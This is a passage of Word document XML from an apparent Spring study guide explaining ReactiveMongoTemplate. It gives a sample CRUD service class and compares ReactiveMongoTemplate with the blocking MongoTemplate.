          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> objects. You can create complex queries with criteria, sorting, pagination, etc., in a reactive manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9BA6F1"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Integration with ReactiveMongoRepository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D605E6A" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D"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activeMongoTemplate can be used in combination with ReactiveMongoRepository to customize certain operations or queries when the repository methods do not cover your requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7512F3CD" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D"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You can perform custom database operations using ReactiveMongoTemplate inside your service layer while still using ReactiveMongoRepository for simple CRUD operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732003DE" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D"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 Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E415A5B"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Here’s an example of how you might use ReactiveMongoTemplate in a service class for basic CRUD operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C340E88"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141E3719"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mongodb.core.ReactiveMongoTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66347CB1"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mongodb.core.query.Criteria;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A07E80"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data.mongodb.core.query.Query;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5621B310"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org.springframework.stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DF605A"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ort reactor.core.publisher.Mono;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458039FB" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="633D317E"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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA08A69"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class ItemService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EABD9A" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1278A686"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39991389"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ivate ReactiveMongoTemplate reactiveMongoTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408F32BB" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="509A001B"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Save a document in MongoDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F02F349"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Item&gt; saveItem(Item item) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3C0B70"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reactiveMongoTemplate.save(item);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8FB24F"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3CB86CD2" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A339254"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Find a document by id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7781526A"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Item&gt; getItemById(String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3743ABA9"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Query query = new Query(Criteria.where("id").is(id));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1D55AD"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reactiveMongoTemplate.findOne(query, Item.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126C9B2D"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6B89D234" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21521253"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Delete a document by id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6495B053"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ublic Mono&lt;Void&gt; deleteItem(String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9A4681"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Query query = new Query(Criteria.where("id").is(id));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028FA15A"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reactiveMongoTemplate.remove(query, Item.class).then();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2DAF0B"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02A11F6E"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7A3F6EB0" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D"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Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E864AD3"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Non-blocking:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> All MongoDB operations are non-blocking and work seamlessly in reactive applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F17F5B"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fficient for High Concurrency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> As it uses asynchronous operations, it is highly efficient for applications with high throughput and concurrent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAFA5E4" w14:textId="77777777" w:rsidR="00F7253D"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Integration with Reactor:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> It integrates well with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Project Reactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and supports reactive streams (Mono and Flux), which is the foundation of Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED9D855" w14:textId="2199C2F3" w:rsidR="00163F3B" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253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 summary, ReactiveMongoTemplate in Spring WebFlux is an important tool for implementing non-blocking, reactive database operations with MongoDB, making it a key part of building scalable and responsive applications in a reactive programming environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464D0607"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96D60EF">
          <v:rect id="_x0000_i2332" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ED0985" w14:textId="4BD0E922"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29" w:name="_Toc196308009"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How does it differ from MongoTemplate in traditional Spring applications</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="529"/>
    </w:p>
    <w:p w14:paraId="650A8E1A" w14:textId="5A45CC2C" w:rsidR="00B506B2" w:rsidRPr="00B13F85" w:rsidRDefault="00B506B2"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ReactiveMongoTemplate and MongoTemplate serve similar purposes in Spring applications, but they differ significantly in terms of how they handle database operations and the underlying programming model. Here's a detailed comparison of how </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ReactiveMongoTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> differs from </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MongoTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in traditional (non-reactive) Spring applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FA6415"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 Programming Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DE59B1"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MongoTemplate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D238987"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Blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: MongoTemplate is part of the traditional, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>imperative programming model</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. All database operations are </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronous and blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning the thread is blocked until the operation completes. For example, if a database query is being executed, the thread waits until the result is fetched before moving to the next task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07600306"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ctiveMongoTemplate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0960A951"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Non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: ReactiveMongoTemplate is designed for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring WebFlux. It performs database operations asynchronously and returns </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive types</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Mono, Flux). This allows the application to process other tasks while waiting for the database operation to complete, making it ideal for high-concurrency, scalable applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4C3B60"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2. Return Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738EBF7E"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MongoTemplate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46553B03"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turns immediate values, such as List&lt;T&gt;, T, etc., which block the thread until the database operation is completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC5ADD7"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ctiveMongoTemplate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AB0373"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Returns </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive types</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB00D4D" w14:textId="77777777" w:rsidR="00B506B2" w:rsidRPr="00B13F85" w:rsidRDefault="00B506B2" w:rsidP="00B13F85">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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ono&lt;T&gt;: Represents 0 or 1 result (single value or empty).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFAF120" w14:textId="77777777" w:rsidR="00B506B2" w:rsidRPr="00B13F85" w:rsidRDefault="00B506B2" w:rsidP="00B13F85">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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lux&lt;T&gt;: Represents 0 to N results (a stream of results).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650154A1"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hese types are used to handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous data flows</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The actual result will be obtained when the publisher (i.e., the stream) is subscribed to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F189600"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3. Thread Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3F8551"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MongoTemplate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EA766D"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orks in a traditional, synchronous fashion where the thread is blocked until the operation finishes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CE1322"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ctiveMongoTemplate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC0C988"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Works in an </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven</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non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> manner. It uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactor-based concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where threads are not blocked, and the application can efficiently handle other tasks while waiting for database responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08003981"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4. Performance and Scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAACE34"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MongoTemplate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B5472E"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Since it is </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, it can cause thread exhaustion under high load, where each database operation consumes a thread from the thread pool, leading to performance degradation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F788294"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ctiveMongoTemplate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3663EB"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t allows handling a large number of concurrent database requests without blocking threads, making it more </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalable</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efficient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> under high load. The non-blocking nature of reactive programming helps to maximize the use of threads, which is ideal for applications that need to handle high levels of concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA42DD3"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5. Integration with Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777ED070"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MongoTemplate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570F6241"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Designed for traditional Spring MVC applications, which are blocking and synchronous by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04394457"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ctiveMongoTemplate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FF6039"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Specifically designed for integration with </w:t>
      </w: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xml:space="preserve"> (a reactive framework), allowing applications to use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking, asynchronous operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for database interaction. It integrates seamlessly with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, Spring's reactive programming library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171B4167"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6. Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA8C5F7"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MongoTemplate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BF5B63"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deal for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>traditional Spring applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where synchronous database operations are sufficient, and blocking behavior is acceptable, such as small to medium-sized applications with lower concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C21C9D2"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ctiveMongoTemplate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5748437F"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deal for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive Spring WebFlux applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, especially when the application needs to handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high concurrency</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real-time updates</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non-blocking database interactions</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for scalable performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A52408C"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7. Error Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1082F36F"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MongoTemplate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC1A220"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Error handling is synchronous and generally involves traditional exception handling (e.g., try-catch blocks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41754CF6"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ctiveMongoTemplate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C166111"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rror handling is part of the reactive pipeline and can be handled using reactive operators like onErrorResume(), onErrorReturn(), etc., making it more flexible for managing asynchronous errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1196B201"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D378842"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Using MongoTemplate in a Traditional Spring Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36733926"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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D64333A"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rivate MongoTemplate mongoTemplate;</w:t>
      </w:r>
    </w:p>
